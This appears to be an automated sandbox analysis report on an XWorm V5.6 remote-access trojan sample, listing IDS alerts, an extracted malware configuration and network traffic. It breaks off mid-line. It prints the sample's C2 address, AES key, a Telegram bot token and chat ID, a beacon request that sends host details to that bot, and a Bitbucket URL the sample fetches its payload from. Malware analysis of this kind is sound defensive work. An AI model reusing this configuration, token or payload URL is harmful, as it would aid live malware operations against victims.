                2025-03-16T01:40:53.010067+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:53.103503+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:53.197188+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:53.294615+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:53.384821+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:53.478528+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:53.572420+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:53.669779+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:53.760407+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:53.885849+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:53.979951+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:54.072958+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:54.165849+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:54.259840+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:54.353534+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:54.447250+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:54.540910+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:54.634812+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-16T01:40:20.281171+010028559241Malware Command and Control Activity Detected192.168.2.84968438.68.49.1507777TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-16T01:40:13.567618+010028531911Malware Command and Control Activity Detected38.68.49.1507777192.168.2.849684TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-16T01:40:13.216579+010028531921Malware Command and Control Activity Detected192.168.2.84968438.68.49.1507777TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-16T01:40:05.104185+010018100071Potentially Bad Traffic192.168.2.849683149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000003.00000002.1455196858.0000000002BB1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["38.68.49.150"], "Port": 7777, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "7679784649:AAH3qQDuOx-OKMgB6WakdqTj8E2yKjPH8Q8", "Telegram Chatid": "-4763076882", "Version": "XWorm V5.6"}
                Source: RegAsm.exe.5384.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7679784649:AAH3qQDuOx-OKMgB6WakdqTj8E2yKjPH8Q8/sendMessage"}
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeReversingLabs: Detection: 33%
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeVirustotal: Detection: 39%Perma Link
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeReversingLabs: Detection: 33%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: 38.68.49.150
                Source: 00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: 7777
                Source: 00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: <123456789>
                Source: 00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: <Xwormmm>
                Source: 00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: XWorm V5.6
                Source: 00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: USB.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.8:49682 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49683 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.8:49685 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.8:49692 version: TLS 1.2
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 0_2_002E895D FindFirstFileExW,0_2_002E895D
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 2_2_00CE895D FindFirstFileExW,2_2_00CE895D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 0674F42Dh3_2_0674EEE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 0674F43Fh3_2_0674EEE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 0674FDF0h3_2_0674F6C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 0674FDF0h3_2_0674F6C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]3_2_07B2A6DC

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.8:49686 -> 38.68.49.150:7777
                Source: Network trafficSuricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.8:49684 -> 38.68.49.150:7777
                Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.8:49686 -> 38.68.49.150:7777
                Source: Network trafficSuricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 38.68.49.150:7777 -> 192.168.2.8:49684
                Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49684 -> 38.68.49.150:7777
                Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 38.68.49.150:7777 -> 192.168.2.8:49684
                Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.8:49684 -> 38.68.49.150:7777
                Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 38.68.49.150:7777 -> 192.168.2.8:49684
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49683 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.8:49683 -> 149.154.167.220:443
                Source: Malware configuration extractorURLs: 38.68.49.150
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficTCP traffic: 192.168.2.8:49684 -> 38.68.49.150:7777
                Source: global trafficHTTP traffic detected: GET /bot7679784649:AAH3qQDuOx-OKMgB6WakdqTj8E2yKjPH8Q8/sendMessage?chat_id=-4763076882&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A78601CBA8DD4C8D8F863%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%204TFRAFLG3%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 185.166.143.48 185.166.143.48
                Source: Joe Sandbox ViewIP Address: 185.166.143.50 185.166.143.50
                Source: Joe Sandbox ViewASN Name: MAJESTIC-HOSTING-01US MAJESTIC-HOSTING-01US
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
                Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
                Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                Source: unknownTCP traffic detected without corresponding DNS query: 23.60.201.147
                Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.63
                Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
                Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: unknownTCP traffic detected without corresponding DNS query: 38.68.49.150
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 2_2_00CCAC00 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,InternetOpenA,FreeLibrary,_strlen,InternetOpenUrlA,FreeLibrary,InternetReadFile,InternetCloseHandle,FreeLibrary,2_2_00CCAC00
                Source: global trafficHTTP traffic detected: GET /riskwca/cscacxxxc/raw/52d52529adfd79ed3c245e8a5cbeec06b7e5e45d/sdcsdcecd HTTP/1.1Accept: */*User-Agent: Chrome/95.0.4638.54Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /bot7679784649:AAH3qQDuOx-OKMgB6WakdqTj8E2yKjPH8Q8/sendMessage?chat_id=-4763076882&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A78601CBA8DD4C8D8F863%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%204TFRAFLG3%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /riskwca/cscacxxxc/raw/52d52529adfd79ed3c245e8a5cbeec06b7e5e45d/sdcsdcecd HTTP/1.1Accept: */*User-Agent: Chrome/95.0.4638.54Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /riskwca/cscacxxxc/raw/52d52529adfd79ed3c245e8a5cbeec06b7e5e45d/sdcsdcecd HTTP/1.1Accept: */*User-Agent: Chrome/95.0.4638.54Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: c.pki.goog
                Source: RegAsm.exe, 00000003.00000002.1455196858.0000000002BB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RegAsm.exe, 00000003.00000002.1455196858.0000000002BB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458491567.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458718699.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458491567.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1455196858.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030380383.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114239427.0000000000995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: RegAsm.exe, 00000003.00000002.1455196858.0000000002BB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7679784649:AAH3qQDuOx-OKMgB6WakdqTj8E2yKjPH8Q8/sendMessage?chat_id=-4763
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913163581.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458583330.0000000000650000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913107196.0000000000673000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1459004700.000000000065D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1459004700.0000000000650000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030800082.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030719769.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114654116.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114654116.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458583330.0000000000650000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1459004700.0000000000650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030719769.0000000000AF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114654116.00000000008E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paasg
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114654116.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114654116.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913107196.0000000000673000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1459004700.000000000065D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030800082.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913107196.0000000000673000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1459004700.000000000065D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030800082.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913107196.0000000000673000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1459004700.000000000065D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030800082.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030800082.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.0000000000920000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1458891957.0000000000637000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458583330.0000000000650000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1458891957.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1459004700.0000000000650000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030719769.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030800082.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030719769.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.0000000000920000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000091F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114654116.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114654116.000000000090D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/riskwca/cscacxxxc/raw/52d52529adfd79ed3c245e8a5cbeec06b7e5e45d/sdcsdcecd
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.0000000000920000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/riskwca/cscacxxxc/raw/52d52529adfd79ed3c245e8a5cbeec06b7e5e45d/sdcsdcecd:y
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114654116.000000000090D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/riskwca/cscacxxxc/raw/52d52529adfd79ed3c245e8a5cbeec06b7e5e45d/sdcsdcecdu
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1458891957.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/riskwca/cscacxxxc/raw/52d52529adfd79ed3c245e8a5cbeec06b7e5e45d/sdcsdcecdvHe
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913163581.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458583330.0000000000650000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913107196.0000000000673000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1459004700.000000000065D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1459004700.0000000000650000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030800082.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030719769.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 